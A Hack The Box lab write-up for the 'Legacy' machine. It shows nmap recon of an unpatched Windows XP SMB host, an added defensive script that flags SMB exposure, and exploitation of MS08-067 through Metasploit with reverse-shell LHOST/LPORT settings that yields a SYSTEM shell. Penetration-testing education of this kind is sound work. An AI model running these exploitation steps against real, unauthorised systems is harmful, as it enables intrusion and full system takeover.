🕵 HTB-Writeup : LEGACY

Recon

Port and service detection with nmap: nmap -A 10.10.10.4

nmap returns the following information:

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m48s, deviation: 2h07m16s, median: 4d22h57m48s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ff:c9 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-07-15T00:00:06+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Let's try to connect anonymously to port 445 (SMB): smbclient -L \\10.10.10.4

It doesn't work, and after trying a few other default accounts we still can't connect to the SMB server.

Let's dig further into the SMB server on port 445. The nmap scan reports that the host is most likely running Windows XP, so CVE-2008-4250 (MS08-067) is a plausible candidate.
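To show how the recon output above translates into a repeatable check, here is an added triage script (not part of the original writeup) that parses the text of an nmap -A report and flags the SMB exposure indicators this scan revealed: an end-of-life operating system, SMB signing disabled, guest access accepted by the script probes, and a failed SMB2 negotiation (the host only speaks SMBv1). The embedded sample report is copied from the scan shown above; the end-of-life OS list, the finding labels and the function names are my own assumptions.

```python
"""Triage an nmap -A text report for SMB exposure indicators.

Added example, not part of the original writeup. The sample report is the
scan output from the writeup; the labels and OS list are assumptions."""
import re

# Constructed sample: the relevant lines of the nmap scan from the writeup.
NMAP_REPORT = """\
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

# Operating systems that no longer receive security updates (assumption: a
# small hard-coded list; a real tool would take this from inventory data).
END_OF_LIFE_OS = ("windows xp", "windows 2000", "windows server 2003")

# Matches nmap's "PORT STATE SERVICE VERSION" table rows.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(report: str) -> list[dict]:
    """Return one dict per port row found in the report."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def smb_findings(report: str) -> list[str]:
    """Flag SMB-related risk indicators exposed by nmap's host scripts."""
    findings = []
    open_ports = {p["port"] for p in parse_ports(report) if p["state"] == "open"}
    if 445 in open_ports:
        findings.append("SMB (445/tcp) reachable")
    if 139 in open_ports:
        findings.append("NetBIOS session service (139/tcp) reachable")

    lower = report.lower()
    for os_name in END_OF_LIFE_OS:
        if os_name in lower:
            findings.append(f"end-of-life OS reported: {os_name}")
            break  # one EOL finding per host is enough

    # Anything other than "required" leaves SMB traffic open to relay/tampering.
    m = re.search(r"message_signing:\s*(\w+)", report)
    if m and m.group(1).lower() != "required":
        findings.append(f"SMB signing {m.group(1)} (relay/tamper risk)")

    if re.search(r"account_used:\s*guest", report):
        findings.append("guest session accepted for script probes")

    # nmap's smb2-time script fails when the server never negotiates SMB2.
    if "Protocol negotiation failed (SMB2)" in report:
        findings.append("SMB2 negotiation failed: host likely speaks SMBv1 only")

    return findings


if __name__ == "__main__":
    for finding in smb_findings(NMAP_REPORT):
        print("-", finding)
```

Run it on a saved `nmap -A` report (`nmap -A -oN legacy.txt 10.10.10.4`, then read the file instead of NMAP_REPORT) to get the same list for any host; each finding maps to a remediation item (decommission or isolate the EOL host, require SMB signing, disable SMBv1, disable guest access).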

Exploit

To keep it simple, we use Metasploit and the exploit module windows/smb/ms08_067_netapi.

Now we just have to set the options as follows:

* RHOST : 10.10.10.4
* RPORT : 445
* LHOST : 10.10.16.6
* LPORT : 4321

And here is the shell:

Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----

C:\WINDOWS\system32>

Post-exploitation

As usual, the user flag is on the user's desktop. The root flag is just as easy to reach, since our reverse shell is already running as SYSTEM.

Tags

Easy, External, Network, SAMBA, Penetration Tester Level 2, Remote Code Execution, CVE-2008-4250, Public Vulnerabilities, CVE Exploitation